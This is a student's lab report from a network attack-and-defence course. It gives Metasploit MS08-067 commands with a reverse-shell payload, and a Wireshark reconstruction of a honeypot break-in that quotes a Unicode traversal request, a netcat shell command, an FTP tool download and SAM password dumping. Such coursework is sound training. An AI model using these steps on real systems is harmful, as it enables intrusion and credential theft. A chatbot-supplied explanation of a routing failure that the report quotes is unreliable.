20252910 2025-2026-2《网络攻防实践》第6次作业

20252910 2025-2026-2《网络攻防实践》第6次作业

1、实验内容

本次实验围绕Windows操作系统安全攻防展开，核心完成以下三大实践任务：

• 使用Metasploit渗透测试框架，以Windows Attacker/BT4为攻击机，针对Windows Metasploitable靶机的MS08-067漏洞发起远程渗透攻击，成功获取靶机系统的访问权限与完全控制权。

• 基于Wireshark分析攻击捕获日志，完整还原攻击者IP（212.116.251.162）对蜜罐主机（172.16.1.106，主机名lab.wiretrip.net）的攻击全流程，解答核心取证问题：所用破解工具及使用方法、获取权限后的操作、防御措施、攻击者是否察觉目标为蜜罐及依据。

• 分为攻方与守方双角色，攻方通过Metasploit选择合适漏洞发起渗透攻击，获取靶机控制权（需记录参与人员、所用漏洞、相关IP等信息）；守方使用Wireshark监听全量网络流量，还原攻击过程、提取攻击特征及相关信息。

2、实验过程

2.1 环境准备

本次实验基于 VMware 虚拟化环境搭建，所有虚拟机处于同一网段，实验前已完成网络连通性校验与基础环境配置，虚拟机角色与 IP 分配如下：

虚拟机	信息	核心角色
Kali	IP 地址：192.168.200.6	核心攻击机、流量分析节点
SEED Ubuntu	IP 地址：192.168.200.4	备用攻击机、辅助分析节点
Win2k Server SP0 target	IP 地址：192.168.200.8	渗透靶机、防守方流量监听节点

2.2 实践一：Metasploit Windows 远程渗透攻击

实验目标

使用 Metasploit 渗透测试框架，针对 Windows 靶机的 MS08-067 漏洞发起远程渗透攻击，成功获取靶机系统的访问权限与完全控制权。

在 Kali 攻击机中切换至 root 权限，启动 Metasploit 依赖的 PostgreSQL 数据库，完成数据库初始化后进入 msfconsole 控制台：

service postgresql start
msfdb init
msfconsole

成功进入 Metasploit 控制台，界面显示框架版本、漏洞利用模块、载荷模块等基础信息，控制台提示符切换为 msf >。

搜索并加载 MS08-067 漏洞利用模块

MS08-067 是 Windows Server 服务 SMB 协议的远程代码执行漏洞，可针对 Windows 2000/XP 系统实现无权限远程渗透。在控制台中执行搜索命令，定位目标漏洞模块：

search ms08_067

搜索结果显示目标漏洞模块路径为 exploit/windows/smb/ms08_067_netapi，漏洞评级为 Great，支持目标系统自动检测。执行 use 命令加载该模块：

use exploit/windows/smb/ms08_067_netapi

模块加载成功后，控制台提示符切换为 msf6 exploit(windows/smb/ms08_067_netapi) >。

配置攻击模块与载荷参数

首先执行 show options 命令，查看漏洞模块的必填配置项，核心必填参数包括靶机地址 RHOSTS、SMB 服务端口 RPORT（默认 445）；为规避防火墙入站限制，选择反向 TCP Shell 载荷，让靶机主动回连攻击机。

• 设置攻击载荷为反向 TCP Shell

set payload generic/shell_reverse_tcp

• 配置核心 IP 参数

set RHOSTS 192.168.200.8
set LHOST 192.168.200.6

• 设置目标系统为自动识别模式

set TARGET 0

配置完成后，再次执行 show options，确认所有参数配置无误，IP 地址与实验环境匹配。

执行渗透攻击并验证结果

参数校验完成后，执行 exploit 命令发起渗透攻击：

exploit

最终输出 Command shell session 1 opened (192.168.200.6:4444 → 192.168.200.8:1042)，表明攻击成功，已建立与靶机的 Shell 会话

成功渗透到靶机win2k，输入命令ipconfig查看靶机的网络信息成功

2.3 实践二：取证分析实践——解码一次成功的 NT 系统破解攻击

将宿主机的共享文件夹挂载到虚拟机上执行以下命令：

先创建挂载目录

sudo mkdir -p /mnt/share

一键挂载

sudo vmhgfs-fuse .host:/share /mnt/share -o allow_other

验证是否成功

cd /mnt/share

ls

使用wireshark打开刚刚拷贝的文件

使用过滤条件ip.addr == 172.16.1.106 and http过滤数据

找到117行的http数据包

从跟踪的 HTTP 流中可发现，攻击者构造了包含特殊 Unicode 编码字符 %C0%AF 的恶意 GET 请求，完整请求内容为：

GET /guest/default.asp/..%C0%AF../..%C0%AF../..%C0%AF../boot.ini HTTP/1.1

其中 %C0%AF 为 Unicode 编码的斜杠 /，攻击者利用 IIS 4.0 的 Unicode 编码解析漏洞，绕过目录访问限制，实现跨目录遍历，成功读取了靶机 Windows NT 系统的启动配置文件 boot.ini，确认了靶机的操作系统版本、系统架构等核心信息，同时验证了目标存在 Unicode 编码高危漏洞，为后续攻击奠定了基础。

RDS 漏洞特征定位

完成漏洞探测后，攻击者针对靶机 IIS 服务的 MDAC RDS 漏洞发起攻击，通过两步完成恶意代码植入：

通过显示过滤器 http.request.uri contains "msadc" 对流量进行筛选。

成功定位到大量针对 msadcs.dll 的 HTTP 请求，该文件为 IIS RDS 服务的核心组件，也是本次攻击的核心利用目标。

恶意请求与攻击工具确认

对 tcp.stream eq 11 的 TCP 数据流进行跟踪分析。

从数据流中可发现，攻击者构造了包含 SQL 注入语句的 POST 请求，请求中包含特征字符串 !ADM!ROX!YOUR!WORLD!，同时针对 /msadc/msadcs.dll/AdvancedDataFactory.Query 接口发起恶意调用。

经特征匹配与漏洞库关联，确认攻击者使用了 rain forest puppy 编写的 msadc(2).pl 渗透攻击工具，该工具专门针对 Windows IIS 系统的 MDAC RDS 漏洞发起攻击，通过 SQL 注入实现远程命令执行，为后续植入恶意工具、获取系统权限提供了入口。

权限获取阶段：反向 Shell 配置与恶意工具下载

通过 RDS 漏洞获得远程代码执行权限后，攻击者开展了反向 Shell 配置与恶意工具下载操作，完成对靶机的持久化控制。

反向 Shell 端口配置

对 tcp.stream eq 109 的数据流进行筛选。

从跟踪的 HTTP 流中可发现，攻击者通过恶意请求植入了 nc -l -p 6969 -e cmd1.exe 命令，该命令通过 netcat 工具在靶机的 6969 端口开启监听，绑定系统 cmd 命令行程序，实现反向 Shell 功能，为攻击者提供了靶机的交互式命令行控制权限。

FTP 恶意工具下载

为实现权限提升与口令窃取，攻击者通过 FTP 协议从远程服务器下载恶意工具，对 tcp.stream eq 106 的 TCP 数据流进行跟踪分析。

从数据流中可发现，攻击者通过构造的 ftpcom 脚本，连接远程 FTP 服务器 www.nether.net，使用用户名 johna2k、密码 haxedj00 完成登录认证，成功从服务器下载了：

• nc.exe（netcat 工具）
• pdump.exe 与 samdump.dll（Windows 系统口令提取工具）

三个恶意文件，为后续的权限提升、口令窃取操作提供了工具支撑。流量分析显示，直至数据包编号 1106，攻击者完成 FTP 登录并成功完成所有文件的下载。

攻击后操作阶段：系统操作与蜜罐识别

攻击者获得靶机完整控制权后，开展了一系列系统操作，同时识别出了靶机的蜜罐属性。对 tcp.stream eq 178 的 TCP 数据流进行跟踪分析。

从跟踪的数据流中，可完整还原攻击者获得权限后的核心操作：

执行 net session、net users、net group、net localgroup 等系统命令，枚举靶机的本地用户、用户组与会话信息，尝试获取本地管理员权限。
借助提前下载的 pdump.exe 与 samdump.dll 工具，提取 Windows 注册表 SAM 数据库中的账号密码密文，同时执行 rdisk -/s 命令创建 SAM 口令文件备份，并将其保存为 c:\har.txt，完成系统账号口令的窃取。
执行 del 命令删除上传的 samdump.dll、pdump.exe 等工具文件，清理攻击痕迹。
遍历靶机文件系统后，执行 echo best honeypot i've seen till now :) > rfp.txt 命令，在靶机根目录创建文本文件，明确标记该目标为蜜罐主机，确认攻击者已识别出靶机的蜜罐属性。

1. 攻击者使用了什么破解工具进行攻击？

   攻击者使用 Rain Forest Puppy 编写的msadc(2).pl工具，针对 Windows IIS 系统 MDAC RDS 远程代码执行漏洞进行渗透攻击。

2. 攻击者如何使用这个破解工具进入并控制了系统？

   漏洞探测：利用 IIS 4.0 Unicode 目录遍历漏洞，读取靶机系统文件，确认目标为未打补丁 Windows NT IIS 4.0 系统，验证 RDS 漏洞存在。

   漏洞利用：使用 msadc (2).pl 工具攻击 msadcs.dll 组件，通过 SQL 注入实现远程命令执行；FTP 下载 nc.exe 等攻击工具，开启 6969 端口反向 Shell，获取靶机系统交互式控制权。

3. 攻击者获得系统访问权限后做了什么？

   执行系统命令枚举本地用户、用户组信息，尝试权限提升；

   使用工具提取 SAM 数据库账号密码密文，窃取系统账号口令；

   删除本地上传的攻击工具，清理入侵痕迹；

   在靶机创建文件，标记目标为蜜罐。

4. 我们如何防止这样的攻击？

   及时安装系统与 IIS 官方安全补丁，修复 Unicode、RDS 高危漏洞；

   禁用闲置高危服务与 IIS 非必要组件，收敛攻击面；

   防火墙封禁高危端口，阻断反向 Shell 外联行为；

   部署 IDS 入侵检测系统，审计 Web 与系统访问日志；

   遵循最小权限原则，降低 Web 服务运行账号权限。

5. 你觉得攻击者是否警觉了他的目标是一台蜜罐主机？如果是，为什么

​ 已经明确察觉。

​ 直接证据：攻击者在靶机写入best honeypot i've seen till now :)蜜罐标记文件。识别原因：靶机保留大量公开高危未修补漏洞、存在大量渗透测试样本、完全放任攻击者攻击不拦截响应，不符合正常业务服务器特征。

2.4 实践三：团队对抗实践——Windows 系统远程渗透攻击与流量分析

攻方使用metasploit选择漏洞进行攻击，获得控制权。（要求写出攻击方的同学信息、使用漏洞、相关IP地址等）
防守方使用wireshark监听获得的网络数据包，分析攻击过程，获取相关信息。

攻击机kali ip地址：192.168.43.19 （lct）
靶机Win2k ip地址： 192.168.43.129 （lyc）

实验前准备

• winsp和kali全部改为桥接模式。
• windows的需要自己改地址
• 连在同一个网络下

msfconsole

use exploit/windows/smb/ms08_067_netapi

show payloads

set payload generic/shell_reverse_tcp

set LHOST 192.168.43.19

set RHOST 192.168.43.129

show options

exploit

ipconfig -all

防御分析追踪流

3、实验中遇到的问题

• 一开始的时候，我攻击机和靶机不在一个网段但是可以ping通但是无法做攻击实践。

最后把攻击机和靶机改在同一个网段下最后完成了实验。

问了豆包说原因是：

本次 MS08-067 渗透攻击采用reverse_tcp 反向 TCP 反弹载荷，跨网段攻击时漏洞虽成功触发，但 Windows 2000 靶机受系统原生路由安全策略限制，无法主动跨网段出站连接攻击机监听端口，导致无法建立会话攻击失败；

将攻击机与靶机调整至同一局域网网段后，靶机可正常发起同网段反向连接，成功建立反弹 Shell，获取靶机系统控制权。

4、学习感悟与思考

这次实践主要就是围绕Windows系统的安全攻防来做的，一共完成了三个任务：用Metasploit工具远程渗透Windows靶机、分析一次NT系统被攻击的完整过程、还有团队之间的攻防对抗。实操的时候，我学会了用Metasploit和Wireshark这两个工具，也弄明白了MS08-067、IIS Unicode这些漏洞是怎么被利用的，以及该怎么防范。同时我也发现，网络环境、靶机系统能不能兼容这些小细节，都会影响攻击能不能成功。通过这次实践，我解决问题、分析问题和团队配合的能力都有提升，也懂了攻击和防御是相互关联的，知道了做网络安全要守规矩，不能用学到的技能做坏事。另外，我也清楚自己还有不足，比如对工具的高级用法还不熟练，分析复杂的网络流量也有点吃力，以后会针对性地改进，慢慢提高自己的网络安全实操能力。